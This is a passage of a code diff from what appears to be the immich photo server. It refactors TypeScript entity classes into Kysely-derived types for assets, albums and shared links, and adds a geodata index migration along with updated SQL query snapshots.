+  createdAt: Date;
+  description: string | null;
+  expiresAt: Date | null;
+  key: Buffer;
+  password: string | null;
+  showExif: boolean;
+  type: SharedLinkType;
+  userId: string;
+};
+
+export type Album = Selectable<Albums> & {
+  owner: User;
+  assets: MapAsset[];
+};
+
 export type AuthSession = {
   id: string;
 };
@@ -256,10 +264,6 @@ export type AssetFace = {
   person?: Person | null;
 };

-export type AssetJobStatus = Selectable<DatabaseAssetJobStatus> & {
-  asset: AssetEntity;
-};
-
 const userColumns = ['id', 'name', 'email', 'profileImagePath', 'profileChangedAt'] as const;

 export const columns = {
6 server/src/db.d.ts vendored
@@ -143,8 +143,8 @@ export interface Assets {
   duplicateId: string | null;
   duration: string | null;
   encodedVideoPath: Generated<string | null>;
-  fileCreatedAt: Timestamp | null;
-  fileModifiedAt: Timestamp | null;
+  fileCreatedAt: Timestamp;
+  fileModifiedAt: Timestamp;
   id: Generated<string>;
   isArchived: Generated<boolean>;
   isExternal: Generated<boolean>;
@@ -153,7 +153,7 @@ export interface Assets {
   isVisible: Generated<boolean>;
   libraryId: string | null;
   livePhotoVideoId: string | null;
-  localDateTime: Timestamp | null;
+  localDateTime: Timestamp;
   originalFileName: string;
   originalPath: string;
   ownerId: string;
@@ -2,10 +2,10 @@ import { ApiProperty } from '@nestjs/swagger';
 import { Type } from 'class-transformer';
 import { ArrayNotEmpty, IsArray, IsEnum, IsString, ValidateNested } from 'class-validator';
 import _ from 'lodash';
-import { AssetResponseDto, mapAsset } from 'src/dtos/asset-response.dto';
+import { AlbumUser, AuthSharedLink, User } from 'src/database';
+import { AssetResponseDto, MapAsset, mapAsset } from 'src/dtos/asset-response.dto';
 import { AuthDto } from 'src/dtos/auth.dto';
 import { UserResponseDto, mapUser } from 'src/dtos/user.dto';
-import { AlbumEntity } from 'src/entities/album.entity';
 import { AlbumUserRole, AssetOrder } from 'src/enum';
 import { Optional, ValidateBoolean, ValidateUUID } from 'src/validation';

@@ -142,7 +142,23 @@ export class AlbumResponseDto {
   order?: AssetOrder;
 }

-export const mapAlbum = (entity: AlbumEntity, withAssets: boolean, auth?: AuthDto): AlbumResponseDto => {
+export type MapAlbumDto = {
+  albumUsers?: AlbumUser[];
+  assets?: MapAsset[];
+  sharedLinks?: AuthSharedLink[];
+  albumName: string;
+  description: string;
+  albumThumbnailAssetId: string | null;
+  createdAt: Date;
+  updatedAt: Date;
+  id: string;
+  ownerId: string;
+  owner: User;
+  isActivityEnabled: boolean;
+  order: AssetOrder;
+};
+
+export const mapAlbum = (entity: MapAlbumDto, withAssets: boolean, auth?: AuthDto): AlbumResponseDto => {
   const albumUsers: AlbumUserResponseDto[] = [];

   if (entity.albumUsers) {
@@ -159,7 +175,7 @@ export const mapAlbum = (entity: AlbumEntity, withAssets: boolean, auth?: AuthDt

   const assets = entity.assets || [];

-  const hasSharedLink = entity.sharedLinks?.length > 0;
+  const hasSharedLink = !!entity.sharedLinks && entity.sharedLinks.length > 0;
   const hasSharedUser = albumUsers.length > 0;

   let startDate = assets.at(0)?.localDateTime;
@@ -190,5 +206,5 @@ export const mapAlbum = (entity: AlbumEntity, withAssets: boolean, auth?: AuthDt
   };
 };

-export const mapAlbumWithAssets = (entity: AlbumEntity) => mapAlbum(entity, true);
-export const mapAlbumWithoutAssets = (entity: AlbumEntity) => mapAlbum(entity, false);
+export const mapAlbumWithAssets = (entity: MapAlbumDto) => mapAlbum(entity, true);
+export const mapAlbumWithoutAssets = (entity: MapAlbumDto) => mapAlbum(entity, false);
@@ -1,5 +1,6 @@
 import { ApiProperty } from '@nestjs/swagger';
-import { AssetFace } from 'src/database';
+import { Selectable } from 'kysely';
+import { AssetFace, AssetFile, Exif, Stack, Tag, User } from 'src/database';
 import { PropertyLifecycle } from 'src/decorators';
 import { AuthDto } from 'src/dtos/auth.dto';
 import { ExifResponseDto, mapExif } from 'src/dtos/exif.dto';
@@ -11,8 +12,7 @@ import {
 } from 'src/dtos/person.dto';
 import { TagResponseDto, mapTag } from 'src/dtos/tag.dto';
 import { UserResponseDto, mapUser } from 'src/dtos/user.dto';
-import { AssetEntity } from 'src/entities/asset.entity';
-import { AssetType } from 'src/enum';
+import { AssetStatus, AssetType } from 'src/enum';
 import { mimeTypes } from 'src/utils/mime-types';

 export class SanitizedAssetResponseDto {
@@ -56,6 +56,44 @@ export class AssetResponseDto extends SanitizedAssetResponseDto {
   resized?: boolean;
 }

+export type MapAsset = {
+  createdAt: Date;
+  updatedAt: Date;
+  deletedAt: Date | null;
+  id: string;
+  updateId: string;
+  status: AssetStatus;
+  checksum: Buffer<ArrayBufferLike>;
+  deviceAssetId: string;
+  deviceId: string;
+  duplicateId: string | null;
+  duration: string | null;
+  encodedVideoPath: string | null;
+  exifInfo?: Selectable<Exif> | null;
+  faces?: AssetFace[];
+  fileCreatedAt: Date;
+  fileModifiedAt: Date;
+  files?: AssetFile[];
+  isArchived: boolean;
+  isExternal: boolean;
+  isFavorite: boolean;
+  isOffline: boolean;
+  isVisible: boolean;
+  libraryId: string | null;
+  livePhotoVideoId: string | null;
+  localDateTime: Date;
+  originalFileName: string;
+  originalPath: string;
+  owner?: User | null;
+  ownerId: string;
+  sidecarPath: string | null;
+  stack?: Stack | null;
+  stackId: string | null;
+  tags?: Tag[];
+  thumbhash: Buffer<ArrayBufferLike> | null;
+  type: AssetType;
+};
+
 export class AssetStackResponseDto {
   id!: string;

@@ -72,7 +110,7 @@ export type AssetMapOptions = {
 };

 // TODO: this is inefficient
-const peopleWithFaces = (faces: AssetFace[]): PersonWithFacesResponseDto[] => {
+const peopleWithFaces = (faces?: AssetFace[]): PersonWithFacesResponseDto[] => {
   const result: PersonWithFacesResponseDto[] = [];
   if (faces) {
     for (const face of faces) {
@@ -90,7 +128,7 @@ const peopleWithFaces = (faces: AssetFace[]): PersonWithFacesResponseDto[] => {
   return result;
 };

-const mapStack = (entity: AssetEntity) => {
+const mapStack = (entity: { stack?: Stack | null }) => {
   if (!entity.stack) {
     return null;
   }
@@ -111,7 +149,7 @@ export const hexOrBufferToBase64 = (encoded: string | Buffer) => {
   return encoded.toString('base64');
 };

-export function mapAsset(entity: AssetEntity, options: AssetMapOptions = {}): AssetResponseDto {
+export function mapAsset(entity: MapAsset, options: AssetMapOptions = {}): AssetResponseDto {
   const { stripMetadata = false, withStack = false } = options;

   if (stripMetadata) {
@@ -4,7 +4,6 @@ import { IsEnum, IsInt, IsObject, IsPositive, ValidateNested } from 'class-valid
 import { Memory } from 'src/database';
 import { AssetResponseDto, mapAsset } from 'src/dtos/asset-response.dto';
 import { AuthDto } from 'src/dtos/auth.dto';
-import { AssetEntity } from 'src/entities/asset.entity';
 import { MemoryType } from 'src/enum';
 import { Optional, ValidateBoolean, ValidateDate, ValidateUUID } from 'src/validation';

@@ -103,6 +102,6 @@ export const mapMemory = (entity: Memory, auth: AuthDto): MemoryResponseDto => {
     type: entity.type as MemoryType,
     data: entity.data as unknown as MemoryData,
     isSaved: entity.isSaved,
-    assets: ('assets' in entity ? entity.assets : []).map((asset) => mapAsset(asset as AssetEntity, { auth })),
+    assets: ('assets' in entity ? entity.assets : []).map((asset) => mapAsset(asset, { auth })),
   };
 };
@@ -1,9 +1,9 @@
 import { ApiProperty } from '@nestjs/swagger';
 import { IsEnum, IsString } from 'class-validator';
 import _ from 'lodash';
+import { SharedLink } from 'src/database';
 import { AlbumResponseDto, mapAlbumWithoutAssets } from 'src/dtos/album.dto';
 import { AssetResponseDto, mapAsset } from 'src/dtos/asset-response.dto';
-import { SharedLinkEntity } from 'src/entities/shared-link.entity';
 import { SharedLinkType } from 'src/enum';
 import { Optional, ValidateBoolean, ValidateDate, ValidateUUID } from 'src/validation';

@@ -102,7 +102,7 @@ export class SharedLinkResponseDto {
   showMetadata!: boolean;
 }

-export function mapSharedLink(sharedLink: SharedLinkEntity): SharedLinkResponseDto {
+export function mapSharedLink(sharedLink: SharedLink): SharedLinkResponseDto {
   const linkAssets = sharedLink.assets || [];

   return {
@@ -122,7 +122,7 @@ export function mapSharedLink(sharedLink: SharedLinkEntity): SharedLinkResponseD
   };
 }

-export function mapSharedLinkWithoutMetadata(sharedLink: SharedLinkEntity): SharedLinkResponseDto {
+export function mapSharedLinkWithoutMetadata(sharedLink: SharedLink): SharedLinkResponseDto {
   const linkAssets = sharedLink.assets || [];
   const albumAssets = (sharedLink?.album?.assets || []).map((asset) => asset);

@@ -137,7 +137,7 @@ export function mapSharedLinkWithoutMetadata(sharedLink: SharedLinkEntity): Shar
     type: sharedLink.type,
     createdAt: sharedLink.createdAt,
     expiresAt: sharedLink.expiresAt,
-    assets: assets.map((asset) => mapAsset(asset, { stripMetadata: true })) as AssetResponseDto[],
+    assets: assets.map((asset) => mapAsset(asset, { stripMetadata: true })),
     album: sharedLink.album ? mapAlbumWithoutAssets(sharedLink.album) : undefined,
     allowUpload: sharedLink.allowUpload,
     allowDownload: sharedLink.allowDownload,
@ -1,23 +0,0 @@
|
|||||||
import { AlbumUser, User } from 'src/database';
|
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
|
||||||
import { SharedLinkEntity } from 'src/entities/shared-link.entity';
|
|
||||||
import { AssetOrder } from 'src/enum';
|
|
||||||
|
|
||||||
export class AlbumEntity {
|
|
||||||
id!: string;
|
|
||||||
owner!: User;
|
|
||||||
ownerId!: string;
|
|
||||||
albumName!: string;
|
|
||||||
description!: string;
|
|
||||||
createdAt!: Date;
|
|
||||||
updatedAt!: Date;
|
|
||||||
updateId?: string;
|
|
||||||
deletedAt!: Date | null;
|
|
||||||
albumThumbnailAsset!: AssetEntity | null;
|
|
||||||
albumThumbnailAssetId!: string | null;
|
|
||||||
albumUsers!: AlbumUser[];
|
|
||||||
assets!: AssetEntity[];
|
|
||||||
sharedLinks!: SharedLinkEntity[];
|
|
||||||
isActivityEnabled!: boolean;
|
|
||||||
order!: AssetOrder;
|
|
||||||
}
|
|
src/entities/asset.entity.ts (deleted)
@@ -1,270 +0,0 @@
-import { DeduplicateJoinsPlugin, ExpressionBuilder, Kysely, SelectQueryBuilder, sql } from 'kysely';
-import { jsonArrayFrom, jsonObjectFrom } from 'kysely/helpers/postgres';
-import { AssetFace, AssetFile, AssetJobStatus, columns, Exif, Stack, Tag, User } from 'src/database';
-import { DB } from 'src/db';
-import { SharedLinkEntity } from 'src/entities/shared-link.entity';
-import { AssetFileType, AssetStatus, AssetType } from 'src/enum';
-import { TimeBucketSize } from 'src/repositories/asset.repository';
-import { AssetSearchBuilderOptions } from 'src/repositories/search.repository';
-import { anyUuid, asUuid } from 'src/utils/database';
-
-export const ASSET_CHECKSUM_CONSTRAINT = 'UQ_assets_owner_checksum';
-
-export class AssetEntity {
-  id!: string;
-  deviceAssetId!: string;
-  owner!: User;
-  ownerId!: string;
-  libraryId?: string | null;
-  deviceId!: string;
-  type!: AssetType;
-  status!: AssetStatus;
-  originalPath!: string;
-  files!: AssetFile[];
-  thumbhash!: Buffer | null;
-  encodedVideoPath!: string | null;
-  createdAt!: Date;
-  updatedAt!: Date;
-  updateId?: string;
-  deletedAt!: Date | null;
-  fileCreatedAt!: Date;
-  localDateTime!: Date;
-  fileModifiedAt!: Date;
-  isFavorite!: boolean;
-  isArchived!: boolean;
-  isExternal!: boolean;
-  isOffline!: boolean;
-  checksum!: Buffer; // sha1 checksum
-  duration!: string | null;
-  isVisible!: boolean;
-  livePhotoVideo!: AssetEntity | null;
-  livePhotoVideoId!: string | null;
-  originalFileName!: string;
-  sidecarPath!: string | null;
-  exifInfo?: Exif;
-  tags?: Tag[];
-  sharedLinks!: SharedLinkEntity[];
-  faces!: AssetFace[];
-  stackId?: string | null;
-  stack?: Stack | null;
-  jobStatus?: AssetJobStatus;
-  duplicateId!: string | null;
-}
-
-export function withExif<O>(qb: SelectQueryBuilder<DB, 'assets', O>) {
-  return qb
-    .leftJoin('exif', 'assets.id', 'exif.assetId')
-    .select((eb) => eb.fn.toJson(eb.table('exif')).$castTo<Exif | null>().as('exifInfo'));
-}
-
-export function withExifInner<O>(qb: SelectQueryBuilder<DB, 'assets', O>) {
-  return qb
-    .innerJoin('exif', 'assets.id', 'exif.assetId')
-    .select((eb) => eb.fn.toJson(eb.table('exif')).$castTo<Exif>().as('exifInfo'));
-}
-
-export function withSmartSearch<O>(qb: SelectQueryBuilder<DB, 'assets', O>) {
-  return qb
-    .leftJoin('smart_search', 'assets.id', 'smart_search.assetId')
-    .select((eb) => eb.fn.toJson(eb.table('smart_search')).as('smartSearch'));
-}
-
-export function withFaces(eb: ExpressionBuilder<DB, 'assets'>, withDeletedFace?: boolean) {
-  return jsonArrayFrom(
-    eb
-      .selectFrom('asset_faces')
-      .selectAll('asset_faces')
-      .whereRef('asset_faces.assetId', '=', 'assets.id')
-      .$if(!withDeletedFace, (qb) => qb.where('asset_faces.deletedAt', 'is', null)),
-  ).as('faces');
-}
-
-export function withFiles(eb: ExpressionBuilder<DB, 'assets'>, type?: AssetFileType) {
-  return jsonArrayFrom(
-    eb
-      .selectFrom('asset_files')
-      .select(columns.assetFiles)
-      .whereRef('asset_files.assetId', '=', 'assets.id')
-      .$if(!!type, (qb) => qb.where('asset_files.type', '=', type!)),
-  ).as('files');
-}
-
-export function withFacesAndPeople(eb: ExpressionBuilder<DB, 'assets'>, withDeletedFace?: boolean) {
-  return jsonArrayFrom(
-    eb
-      .selectFrom('asset_faces')
-      .leftJoinLateral(
-        (eb) =>
-          eb.selectFrom('person').selectAll('person').whereRef('asset_faces.personId', '=', 'person.id').as('person'),
-        (join) => join.onTrue(),
-      )
-      .selectAll('asset_faces')
-      .select((eb) => eb.table('person').as('person'))
-      .whereRef('asset_faces.assetId', '=', 'assets.id')
-      .$if(!withDeletedFace, (qb) => qb.where('asset_faces.deletedAt', 'is', null)),
-  ).as('faces');
-}
-
-export function hasPeople<O>(qb: SelectQueryBuilder<DB, 'assets', O>, personIds: string[]) {
-  return qb.innerJoin(
-    (eb) =>
-      eb
-        .selectFrom('asset_faces')
-        .select('assetId')
-        .where('personId', '=', anyUuid(personIds!))
-        .where('deletedAt', 'is', null)
-        .groupBy('assetId')
-        .having((eb) => eb.fn.count('personId').distinct(), '=', personIds.length)
-        .as('has_people'),
-    (join) => join.onRef('has_people.assetId', '=', 'assets.id'),
-  );
-}
-
-export function hasTags<O>(qb: SelectQueryBuilder<DB, 'assets', O>, tagIds: string[]) {
-  return qb.innerJoin(
-    (eb) =>
-      eb
-        .selectFrom('tag_asset')
-        .select('assetsId')
-        .innerJoin('tags_closure', 'tag_asset.tagsId', 'tags_closure.id_descendant')
-        .where('tags_closure.id_ancestor', '=', anyUuid(tagIds))
-        .groupBy('assetsId')
-        .having((eb) => eb.fn.count('tags_closure.id_ancestor').distinct(), '>=', tagIds.length)
-        .as('has_tags'),
-    (join) => join.onRef('has_tags.assetsId', '=', 'assets.id'),
-  );
-}
-
-export function withOwner(eb: ExpressionBuilder<DB, 'assets'>) {
-  return jsonObjectFrom(eb.selectFrom('users').selectAll().whereRef('users.id', '=', 'assets.ownerId')).as('owner');
-}
-
-export function withLibrary(eb: ExpressionBuilder<DB, 'assets'>) {
-  return jsonObjectFrom(eb.selectFrom('libraries').selectAll().whereRef('libraries.id', '=', 'assets.libraryId')).as(
-    'library',
-  );
-}
-
-export function withTags(eb: ExpressionBuilder<DB, 'assets'>) {
-  return jsonArrayFrom(
-    eb
-      .selectFrom('tags')
-      .select(columns.tag)
-      .innerJoin('tag_asset', 'tags.id', 'tag_asset.tagsId')
-      .whereRef('assets.id', '=', 'tag_asset.assetsId'),
-  ).as('tags');
-}
-
-export function truncatedDate<O>(size: TimeBucketSize) {
-  return sql<O>`date_trunc(${size}, "localDateTime" at time zone 'UTC') at time zone 'UTC'`;
-}
-
-export function withTagId<O>(qb: SelectQueryBuilder<DB, 'assets', O>, tagId: string) {
-  return qb.where((eb) =>
-    eb.exists(
-      eb
-        .selectFrom('tags_closure')
-        .innerJoin('tag_asset', 'tag_asset.tagsId', 'tags_closure.id_descendant')
-        .whereRef('tag_asset.assetsId', '=', 'assets.id')
-        .where('tags_closure.id_ancestor', '=', tagId),
-    ),
-  );
-}
-
-const joinDeduplicationPlugin = new DeduplicateJoinsPlugin();
-
-/** TODO: This should only be used for search-related queries, not as a general purpose query builder */
-export function searchAssetBuilder(kysely: Kysely<DB>, options: AssetSearchBuilderOptions) {
-  options.isArchived ??= options.withArchived ? undefined : false;
-  options.withDeleted ||= !!(options.trashedAfter || options.trashedBefore || options.isOffline);
-  return kysely
-    .withPlugin(joinDeduplicationPlugin)
-    .selectFrom('assets')
-    .selectAll('assets')
-    .$if(!!options.tagIds && options.tagIds.length > 0, (qb) => hasTags(qb, options.tagIds!))
-    .$if(!!options.personIds && options.personIds.length > 0, (qb) => hasPeople(qb, options.personIds!))
-    .$if(!!options.createdBefore, (qb) => qb.where('assets.createdAt', '<=', options.createdBefore!))
-    .$if(!!options.createdAfter, (qb) => qb.where('assets.createdAt', '>=', options.createdAfter!))
-    .$if(!!options.updatedBefore, (qb) => qb.where('assets.updatedAt', '<=', options.updatedBefore!))
-    .$if(!!options.updatedAfter, (qb) => qb.where('assets.updatedAt', '>=', options.updatedAfter!))
-    .$if(!!options.trashedBefore, (qb) => qb.where('assets.deletedAt', '<=', options.trashedBefore!))
-    .$if(!!options.trashedAfter, (qb) => qb.where('assets.deletedAt', '>=', options.trashedAfter!))
-    .$if(!!options.takenBefore, (qb) => qb.where('assets.fileCreatedAt', '<=', options.takenBefore!))
-    .$if(!!options.takenAfter, (qb) => qb.where('assets.fileCreatedAt', '>=', options.takenAfter!))
-    .$if(options.city !== undefined, (qb) =>
-      qb
-        .innerJoin('exif', 'assets.id', 'exif.assetId')
-        .where('exif.city', options.city === null ? 'is' : '=', options.city!),
-    )
-    .$if(options.state !== undefined, (qb) =>
-      qb
-        .innerJoin('exif', 'assets.id', 'exif.assetId')
-        .where('exif.state', options.state === null ? 'is' : '=', options.state!),
-    )
-    .$if(options.country !== undefined, (qb) =>
-      qb
-        .innerJoin('exif', 'assets.id', 'exif.assetId')
-        .where('exif.country', options.country === null ? 'is' : '=', options.country!),
-    )
-    .$if(options.make !== undefined, (qb) =>
-      qb
-        .innerJoin('exif', 'assets.id', 'exif.assetId')
-        .where('exif.make', options.make === null ? 'is' : '=', options.make!),
-    )
-    .$if(options.model !== undefined, (qb) =>
-      qb
-        .innerJoin('exif', 'assets.id', 'exif.assetId')
-        .where('exif.model', options.model === null ? 'is' : '=', options.model!),
-    )
-    .$if(options.lensModel !== undefined, (qb) =>
-      qb
-        .innerJoin('exif', 'assets.id', 'exif.assetId')
-        .where('exif.lensModel', options.lensModel === null ? 'is' : '=', options.lensModel!),
-    )
-    .$if(options.rating !== undefined, (qb) =>
-      qb
-        .innerJoin('exif', 'assets.id', 'exif.assetId')
-        .where('exif.rating', options.rating === null ? 'is' : '=', options.rating!),
-    )
-    .$if(!!options.checksum, (qb) => qb.where('assets.checksum', '=', options.checksum!))
-    .$if(!!options.deviceAssetId, (qb) => qb.where('assets.deviceAssetId', '=', options.deviceAssetId!))
-    .$if(!!options.deviceId, (qb) => qb.where('assets.deviceId', '=', options.deviceId!))
-    .$if(!!options.id, (qb) => qb.where('assets.id', '=', asUuid(options.id!)))
-    .$if(!!options.libraryId, (qb) => qb.where('assets.libraryId', '=', asUuid(options.libraryId!)))
-    .$if(!!options.userIds, (qb) => qb.where('assets.ownerId', '=', anyUuid(options.userIds!)))
-    .$if(!!options.encodedVideoPath, (qb) => qb.where('assets.encodedVideoPath', '=', options.encodedVideoPath!))
-    .$if(!!options.originalPath, (qb) =>
-      qb.where(sql`f_unaccent(assets."originalPath")`, 'ilike', sql`'%' || f_unaccent(${options.originalPath}) || '%'`),
-    )
-    .$if(!!options.originalFileName, (qb) =>
-      qb.where(
-        sql`f_unaccent(assets."originalFileName")`,
-        'ilike',
-        sql`'%' || f_unaccent(${options.originalFileName}) || '%'`,
-      ),
-    )
-    .$if(!!options.description, (qb) =>
-      qb
-        .innerJoin('exif', 'assets.id', 'exif.assetId')
-        .where(sql`f_unaccent(exif.description)`, 'ilike', sql`'%' || f_unaccent(${options.description}) || '%'`),
-    )
-    .$if(!!options.type, (qb) => qb.where('assets.type', '=', options.type!))
-    .$if(options.isFavorite !== undefined, (qb) => qb.where('assets.isFavorite', '=', options.isFavorite!))
-    .$if(options.isOffline !== undefined, (qb) => qb.where('assets.isOffline', '=', options.isOffline!))
-    .$if(options.isVisible !== undefined, (qb) => qb.where('assets.isVisible', '=', options.isVisible!))
-    .$if(options.isArchived !== undefined, (qb) => qb.where('assets.isArchived', '=', options.isArchived!))
-    .$if(options.isEncoded !== undefined, (qb) =>
-      qb.where('assets.encodedVideoPath', options.isEncoded ? 'is not' : 'is', null),
-    )
-    .$if(options.isMotion !== undefined, (qb) =>
-      qb.where('assets.livePhotoVideoId', options.isMotion ? 'is not' : 'is', null),
-    )
-    .$if(!!options.isNotInAlbum, (qb) =>
-      qb.where((eb) =>
-        eb.not(eb.exists((eb) => eb.selectFrom('albums_assets_assets').whereRef('assetsId', '=', 'assets.id'))),
-      ),
-    )
-    .$if(!!options.withExif, withExifInner)
-    .$if(!!(options.withFaces || options.withPeople || options.personIds), (qb) => qb.select(withFacesAndPeople))
-    .$if(!options.withDeleted, (qb) => qb.where('assets.deletedAt', 'is', null));
-}
src/entities/shared-link.entity.ts (deleted)
@@ -1,20 +0,0 @@
-import { AlbumEntity } from 'src/entities/album.entity';
-import { AssetEntity } from 'src/entities/asset.entity';
-import { SharedLinkType } from 'src/enum';
-
-export class SharedLinkEntity {
-  id!: string;
-  description!: string | null;
-  password!: string | null;
-  userId!: string;
-  key!: Buffer; // use to access the inidividual asset
-  type!: SharedLinkType;
-  createdAt!: Date;
-  expiresAt!: Date | null;
-  allowUpload!: boolean;
-  allowDownload!: boolean;
-  showExif!: boolean;
-  assets!: AssetEntity[];
-  album?: AlbumEntity;
-  albumId!: string | null;
-}
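The three hand-written entity classes deleted above are superseded by model types derived from the Kysely schema (the SharedLink and MapAsset types referenced elsewhere in this diff). A rough sketch of the idea, with an assumed table shape rather than the real immich schema:

// Illustrative only; the table definition below is an assumption.
import { Generated, Selectable } from 'kysely';

interface SharedLinksTable {
  id: Generated<string>;
  userId: string;
  key: Buffer;
  expiresAt: Date | null;
  allowUpload: boolean;
}

// Selectable<T> is the row shape a SELECT returns (generated columns become
// concrete), so the model type can never drift from what queries are checked against.
export type SharedLink = Selectable<SharedLinksTable>;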
server/src/migrations/1744910873956-AddMissingIndex.ts (new file, 13 lines)
@@ -0,0 +1,13 @@
+import { MigrationInterface, QueryRunner } from 'typeorm';
+
+export class AddMissingIndex1744910873956 implements MigrationInterface {
+  public async up(queryRunner: QueryRunner): Promise<void> {
+    await queryRunner.query(
+      `CREATE INDEX IF NOT EXISTS "IDX_geodata_gist_earthcoord" ON "geodata_places" (ll_to_earth_public(latitude, longitude))`,
+    );
+  }
+
+  public async down(queryRunner: QueryRunner): Promise<void> {
+    await queryRunner.query(`DROP INDEX "IDX_geodata_gist_earthcoord";`);
+  }
+}
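For context: ll_to_earth comes from PostgreSQL's earthdistance extension (ll_to_earth_public is presumably immich's wrapper around it), and an expression index like the one above lets a radius search hit the index instead of recomputing the expression per row. A hedged sketch of the kind of query it serves, assuming standard earthdistance usage:

import { Kysely, sql } from 'kysely';

// Hypothetical helper; table and function names come from the migration above,
// the query shape is an assumption based on typical earth_box usage.
async function nearbyPlaces(db: Kysely<any>, lat: number, lon: number, radiusMeters: number) {
  return sql`
    select * from "geodata_places"
    where earth_box(ll_to_earth_public(${lat}, ${lon}), ${radiusMeters})
      @> ll_to_earth_public(latitude, longitude)
  `.execute(db);
}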
@@ -82,7 +82,7 @@ from
 where
   "assets"."id" = any ($1::uuid[])
 
--- AssetRepository.getByIdsWithAllRelations
+-- AssetRepository.getByIdsWithAllRelationsButStacks
 select
   "assets".*,
   (
@@ -127,28 +127,13 @@ select
       "assets"."id" = "tag_asset"."assetsId"
     ) as agg
   ) as "tags",
-  to_json("exif") as "exifInfo",
-  to_json("stacked_assets") as "stack"
+  to_json("exif") as "exifInfo"
 from
   "assets"
   left join "exif" on "assets"."id" = "exif"."assetId"
   left join "asset_stack" on "asset_stack"."id" = "assets"."stackId"
-  left join lateral (
-    select
-      "asset_stack".*,
-      array_agg("stacked") as "assets"
-    from
-      "assets" as "stacked"
-    where
-      "stacked"."stackId" = "asset_stack"."id"
-      and "stacked"."id" != "asset_stack"."primaryAssetId"
-      and "stacked"."deletedAt" is null
-      and "stacked"."isArchived" = $1
-    group by
-      "asset_stack"."id"
-  ) as "stacked_assets" on "asset_stack"."id" is not null
 where
-  "assets"."id" = any ($2::uuid[])
+  "assets"."id" = any ($1::uuid[])
 
 -- AssetRepository.deleteAll
 delete from "assets"
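A note on the parameter renumbering in the hunk above: the deleted lateral join consumed the first bind parameter ("stacked"."isArchived" = $1), so once it is gone the id-array comparison shifts from $2 to $1. These .sql files appear to be generated snapshots of the queries annotated with @GenerateSql in the repositories below, so they change mechanically along with the TypeScript.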
@@ -1,12 +1,11 @@
 import { Injectable } from '@nestjs/common';
-import { ExpressionBuilder, Insertable, Kysely, sql, Updateable } from 'kysely';
+import { ExpressionBuilder, Insertable, Kysely, NotNull, sql, Updateable } from 'kysely';
 import { jsonArrayFrom, jsonObjectFrom } from 'kysely/helpers/postgres';
 import { InjectKysely } from 'nestjs-kysely';
-import { columns } from 'src/database';
+import { columns, Exif } from 'src/database';
 import { Albums, DB } from 'src/db';
 import { Chunked, ChunkedArray, ChunkedSet, DummyValue, GenerateSql } from 'src/decorators';
 import { AlbumUserCreateDto } from 'src/dtos/album.dto';
-import { AlbumEntity } from 'src/entities/album.entity';
 
 export interface AlbumAssetCount {
   albumId: string;
@@ -21,9 +20,9 @@ export interface AlbumInfoOptions {
 }
 
 const withOwner = (eb: ExpressionBuilder<DB, 'albums'>) => {
-  return jsonObjectFrom(eb.selectFrom('users').select(columns.user).whereRef('users.id', '=', 'albums.ownerId')).as(
-    'owner',
-  );
+  return jsonObjectFrom(eb.selectFrom('users').select(columns.user).whereRef('users.id', '=', 'albums.ownerId'))
+    .$notNull()
+    .as('owner');
 };
 
 const withAlbumUsers = (eb: ExpressionBuilder<DB, 'albums'>) => {
@@ -32,12 +31,14 @@ const withAlbumUsers = (eb: ExpressionBuilder<DB, 'albums'>) => {
       .selectFrom('albums_shared_users_users as album_users')
       .select('album_users.role')
       .select((eb) =>
-        jsonObjectFrom(eb.selectFrom('users').select(columns.user).whereRef('users.id', '=', 'album_users.usersId')).as(
-          'user',
-        ),
+        jsonObjectFrom(eb.selectFrom('users').select(columns.user).whereRef('users.id', '=', 'album_users.usersId'))
+          .$notNull()
+          .as('user'),
       )
       .whereRef('album_users.albumsId', '=', 'albums.id'),
-  ).as('albumUsers');
+  )
+    .$notNull()
+    .as('albumUsers');
 };
 
 const withSharedLink = (eb: ExpressionBuilder<DB, 'albums'>) => {
@@ -53,7 +54,7 @@ const withAssets = (eb: ExpressionBuilder<DB, 'albums'>) => {
       .selectFrom('assets')
      .selectAll('assets')
       .leftJoin('exif', 'assets.id', 'exif.assetId')
-      .select((eb) => eb.table('exif').as('exifInfo'))
+      .select((eb) => eb.table('exif').$castTo<Exif>().as('exifInfo'))
       .innerJoin('albums_assets_assets', 'albums_assets_assets.assetsId', 'assets.id')
       .whereRef('albums_assets_assets.albumsId', '=', 'albums.id')
       .where('assets.deletedAt', 'is', null)
@@ -69,7 +70,7 @@ export class AlbumRepository {
   constructor(@InjectKysely() private db: Kysely<DB>) {}
 
   @GenerateSql({ params: [DummyValue.UUID, { withAssets: true }] })
-  async getById(id: string, options: AlbumInfoOptions): Promise<AlbumEntity | undefined> {
+  async getById(id: string, options: AlbumInfoOptions) {
     return this.db
       .selectFrom('albums')
       .selectAll('albums')
@@ -79,11 +80,12 @@ export class AlbumRepository {
       .select(withAlbumUsers)
       .select(withSharedLink)
       .$if(options.withAssets, (eb) => eb.select(withAssets))
-      .executeTakeFirst() as Promise<AlbumEntity | undefined>;
+      .$narrowType<{ assets: NotNull }>()
+      .executeTakeFirst();
   }
 
   @GenerateSql({ params: [DummyValue.UUID, DummyValue.UUID] })
-  async getByAssetId(ownerId: string, assetId: string): Promise<AlbumEntity[]> {
+  async getByAssetId(ownerId: string, assetId: string) {
     return this.db
       .selectFrom('albums')
       .selectAll('albums')
@@ -105,7 +107,7 @@ export class AlbumRepository {
       .select(withOwner)
       .select(withAlbumUsers)
       .orderBy('albums.createdAt', 'desc')
-      .execute() as unknown as Promise<AlbumEntity[]>;
+      .execute();
   }
 
   @GenerateSql({ params: [[DummyValue.UUID]] })
@@ -134,7 +136,7 @@ export class AlbumRepository {
   }
 
   @GenerateSql({ params: [DummyValue.UUID] })
-  async getOwned(ownerId: string): Promise<AlbumEntity[]> {
+  async getOwned(ownerId: string) {
     return this.db
       .selectFrom('albums')
       .selectAll('albums')
@@ -144,14 +146,14 @@ export class AlbumRepository {
       .where('albums.ownerId', '=', ownerId)
       .where('albums.deletedAt', 'is', null)
       .orderBy('albums.createdAt', 'desc')
-      .execute() as unknown as Promise<AlbumEntity[]>;
+      .execute();
   }
 
   /**
    * Get albums shared with and shared by owner.
    */
   @GenerateSql({ params: [DummyValue.UUID] })
-  async getShared(ownerId: string): Promise<AlbumEntity[]> {
+  async getShared(ownerId: string) {
     return this.db
       .selectFrom('albums')
       .selectAll('albums')
@@ -176,14 +178,14 @@ export class AlbumRepository {
       .select(withOwner)
       .select(withSharedLink)
       .orderBy('albums.createdAt', 'desc')
-      .execute() as unknown as Promise<AlbumEntity[]>;
+      .execute();
   }
 
   /**
    * Get albums of owner that are _not_ shared
    */
   @GenerateSql({ params: [DummyValue.UUID] })
